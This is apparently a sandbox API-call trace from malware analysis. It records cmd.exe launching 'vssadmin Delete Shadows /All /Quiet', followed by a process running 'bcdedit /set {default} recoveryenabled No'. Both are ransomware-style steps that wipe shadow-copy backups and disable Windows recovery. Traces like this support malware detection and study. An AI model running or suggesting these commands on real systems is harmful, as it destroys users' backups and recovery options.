[0076.712] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0076.712] GetProcessHeap () returned 0x690000 [0076.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4bd0 | out: hHeap=0x690000) returned 1 [0076.712] GetEnvironmentStringsW () returned 0x6a40e0* [0076.712] GetProcessHeap () returned 0x690000 [0076.712] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb36) returned 0x6a5f20 [0076.712] FreeEnvironmentStringsW (penv=0x6a40e0) returned 1 [0076.712] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.712] GetProcessHeap () returned 0x690000 [0076.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a56c0 | out: hHeap=0x690000) returned 1 [0076.712] GetProcessHeap () returned 0x690000 [0076.712] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400e) returned 0x6a6a60 [0076.713] GetProcessHeap () returned 0x690000 [0076.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x54) returned 0x6a2db0 [0076.713] GetProcessHeap () returned 0x690000 [0076.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6a60 | out: hHeap=0x690000) returned 1 [0076.713] GetConsoleOutputCP () returned 0x1b5 [0076.713] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.713] GetUserDefaultLCID () returned 0x409 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a824950, cchData=8 | out: lpLCData=":") returned 2 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x34fd88, cchData=128 | out: lpLCData="0") returned 2 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x34fd88, cchData=128 | out: lpLCData="0") returned 2 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x34fd88, cchData=128 | out: lpLCData="1") returned 2 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, 
lpLCData=0x4a824940, cchData=8 | out: lpLCData="/") returned 2 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a824d80, cchData=32 | out: lpLCData="Mon") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a824d40, cchData=32 | out: lpLCData="Tue") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a824d00, cchData=32 | out: lpLCData="Wed") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a824cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a824c80, cchData=32 | out: lpLCData="Fri") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a824c40, cchData=32 | out: lpLCData="Sat") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a824c00, cchData=32 | out: lpLCData="Sun") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a824930, cchData=8 | out: lpLCData=".") returned 2 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a824920, cchData=8 | out: lpLCData=",") returned 2 [0076.715] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0076.716] GetProcessHeap () returned 0x690000 [0076.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20c) returned 0x6a2e10 [0076.717] GetConsoleTitleW (in: lpConsoleTitle=0x6a2e10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.717] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0076.717] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0076.717] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0076.718] GetProcessHeap () returned 0x690000 [0076.718] RtlAllocateHeap 
(HeapHandle=0x690000, Flags=0x8, Size=0x400a) returned 0x6a6a60 [0076.718] GetProcessHeap () returned 0x690000 [0076.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6a60 | out: hHeap=0x690000) returned 1 [0076.718] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0076.718] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0076.718] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0076.718] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0076.718] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0076.718] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0076.719] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0076.719] GetProcessHeap () returned 0x690000 [0076.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3028 [0076.719] GetProcessHeap () returned 0x690000 [0076.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1a) returned 0x6a5760 [0076.719] GetProcessHeap () returned 0x690000 [0076.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x40) returned 0x6a3088 [0076.720] GetConsoleTitleW (in: lpConsoleTitle=0x34fa80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.722] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0076.722] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0076.722] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0076.722] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0076.722] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0076.722] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0076.722] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0076.722] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0076.722] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0076.722] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0076.722] _wcsicmp 
(_String1="vssadmin", _String2="SET") returned 3 [0076.722] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0076.723] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0076.723] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0076.723] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0076.723] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0076.723] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0076.723] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0076.723] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0076.723] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0076.723] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0076.723] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0076.723] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0076.723] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0076.723] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0076.723] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0076.723] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0076.723] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0076.723] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0076.723] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0076.723] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0076.723] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0076.723] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0076.723] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0076.723] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0076.723] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0076.723] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0076.723] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0076.723] _wcsicmp 
(_String1="vssadmin", _String2="FTYPE") returned 16 [0076.723] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0076.724] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0076.724] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0076.724] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0076.724] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0076.724] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0076.724] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0076.724] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0076.724] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0076.724] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0076.724] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0076.724] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0076.724] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0076.724] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0076.724] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0076.724] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0076.724] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0076.724] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0076.724] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0076.724] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0076.724] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0076.724] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", 
_String2="VERIFY") returned 14 [0076.725] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0076.725] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0076.725] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0076.725] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0076.725] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0076.725] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0076.725] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0076.725] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0076.725] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0076.725] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0076.725] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0076.725] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0076.725] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0076.725] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0076.725] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0076.725] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0076.725] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0076.725] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0076.725] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0076.725] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0076.726] GetProcessHeap () returned 0x690000 [0076.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x6a30d0 [0076.726] GetProcessHeap () returned 0x690000 [0076.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x52) returned 0x6a32e8 [0076.726] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0076.726] GetProcessHeap () returned 0x690000 [0076.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x418) returned 0x6907f0 [0076.726] SetErrorMode (uMode=0x0) returned 0x0 
[0076.726] SetErrorMode (uMode=0x1) returned 0x0 [0076.727] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6907f8, lpFilePart=0x34f5a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f5a0*="Desktop") returned 0x25 [0076.727] SetErrorMode (uMode=0x0) returned 0x1 [0076.727] GetProcessHeap () returned 0x690000 [0076.727] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6907f0, Size=0x66) returned 0x6907f0 [0076.727] GetProcessHeap () returned 0x690000 [0076.727] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6907f0) returned 0x66 [0076.727] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.727] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0076.727] GetProcessHeap () returned 0x690000 [0076.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x120) returned 0x6a3348 [0076.727] GetProcessHeap () returned 0x690000 [0076.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x238) returned 0x690860 [0076.735] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x690860, Size=0x122) returned 0x690860 [0076.735] GetProcessHeap () returned 0x690000 [0076.735] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x690860) returned 0x122 [0076.735] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.735] GetProcessHeap () returned 0x690000 [0076.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xe0) returned 0x6a3470 [0076.736] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a3470, Size=0x76) returned 0x6a3470 [0076.736] GetProcessHeap () returned 0x690000 [0076.736] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6a3470) returned 0x76 [0076.737] GetDriveTypeW 
(lpRootPathName="C:\\") returned 0x3 [0076.737] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x34f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34f31c) returned 0xffffffff [0076.738] GetLastError () returned 0x2 [0076.738] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x34f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34f31c) returned 0xffffffff [0076.738] GetLastError () returned 0x2 [0076.738] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.738] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x34f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34f31c) returned 0x6a34f0 [0076.738] GetProcessHeap () returned 0x690000 [0076.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x14) returned 0x6a3530 [0076.738] FindClose (in: hFindFile=0x6a34f0 | out: hFindFile=0x6a34f0) returned 1 [0076.738] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x34f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34f31c) returned 0xffffffff [0076.739] GetLastError () returned 0x2 [0076.739] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x34f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34f31c) returned 0x6a34f0 [0076.739] GetProcessHeap () returned 0x690000 [0076.739] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a3530, Size=0x4) returned 0x6a3530 [0076.739] FindClose (in: hFindFile=0x6a34f0 | out: hFindFile=0x6a34f0) returned 1 [0076.739] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0076.739] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 
[0076.739] GetConsoleTitleW (in: lpConsoleTitle=0x34f814, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.101] InitializeProcThreadAttributeList (in: lpAttributeList=0x34f69c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34f764 | out: lpAttributeList=0x34f69c, lpSize=0x34f764) returned 1 [0077.101] UpdateProcThreadAttribute (in: lpAttributeList=0x34f69c, dwFlags=0x0, Attribute=0x60001, lpValue=0x34f75c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34f69c, lpPreviousValue=0x0) returned 1 [0077.101] GetStartupInfoW (in: lpStartupInfo=0x34f658 | out: lpStartupInfo=0x34f658*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0077.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x18) returned 0x6a34f0 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", 
_MaxCount=0x7) returned -5 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) 
returned -17 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0077.102] GetProcessHeap () returned 0x690000 [0077.102] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a34f0 | out: hHeap=0x690000) returned 1 [0077.102] GetProcessHeap () returned 0x690000 [0077.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa) returned 0x69ff30 [0077.102] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0077.103] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x34f6f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin Delete Shadows /All /Quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x34f744 | out: lpCommandLine="vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x34f744*(hProcess=0x78, hThread=0x74, dwProcessId=0x7b8, dwThreadId=0xc0)) returned 1 [0078.075] CloseHandle (hObject=0x74) returned 1 [0078.075] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0078.075] GetProcessHeap () returned 0x690000 [0078.075] HeapFree (in: hHeap=0x690000, 
dwFlags=0x0, lpMem=0x6a5f20 | out: hHeap=0x690000) returned 1 [0078.075] GetEnvironmentStringsW () returned 0x6a5f20* [0078.075] GetProcessHeap () returned 0x690000 [0078.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb36) returned 0x6a40e0 [0078.075] FreeEnvironmentStringsW (penv=0x6a5f20) returned 1 [0078.075] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0093.124] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x34f638 | out: lpExitCode=0x34f638*=0x2) returned 1 [0093.125] CloseHandle (hObject=0x78) returned 1 [0093.125] _vsnwprintf (in: _Buffer=0x34f780, _BufferCount=0x13, _Format="%08X", _ArgList=0x34f644 | out: _Buffer="00000002") returned 8 [0093.125] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0093.125] GetProcessHeap () returned 0x690000 [0093.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a40e0 | out: hHeap=0x690000) returned 1 [0093.126] GetEnvironmentStringsW () returned 0x6a40e0* [0093.126] GetProcessHeap () returned 0x690000 [0093.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb5c) returned 0x6a95c8 [0093.126] FreeEnvironmentStringsW (penv=0x6a40e0) returned 1 [0093.126] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0093.126] GetProcessHeap () returned 0x690000 [0093.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a95c8 | out: hHeap=0x690000) returned 1 [0093.126] GetEnvironmentStringsW () returned 0x6a40e0* [0093.126] GetProcessHeap () returned 0x690000 [0093.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb5c) returned 0x6a95c8 [0093.126] FreeEnvironmentStringsW (penv=0x6a40e0) returned 1 [0093.126] GetProcessHeap () returned 0x690000 [0093.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69ff30 | out: hHeap=0x690000) returned 1 [0093.126] DeleteProcThreadAttributeList (in: lpAttributeList=0x34f69c | out: lpAttributeList=0x34f69c) [0093.126] _get_osfhandle (_FileHandle=1) returned 0x7 
[0093.126] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0093.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.127] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0093.127] _get_osfhandle (_FileHandle=0) returned 0x3 [0093.127] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0093.128] SetConsoleInputExeNameW () returned 0x1 [0093.128] GetConsoleOutputCP () returned 0x1b5 [0093.128] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0093.128] SetThreadUILanguage (LangId=0x0) returned 0x409 [0093.128] exit (_Code=2) Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4630b000" os_pid = "0xb78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} recoveryenabled No" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 41 os_tid = 0xba4 [0076.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb6c | out: lpSystemTimeAsFileTime=0x14fb6c*(dwLowDateTime=0xf29b8040, dwHighDateTime=0x1d61645)) [0076.892] GetCurrentProcessId () returned 0xb78 [0076.892] GetCurrentThreadId () returned 0xba4 [0076.892] GetTickCount () returned 0x1149770 [0076.892] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb64 | out: lpPerformanceCount=0x14fb64*=19724706241) returned 1 
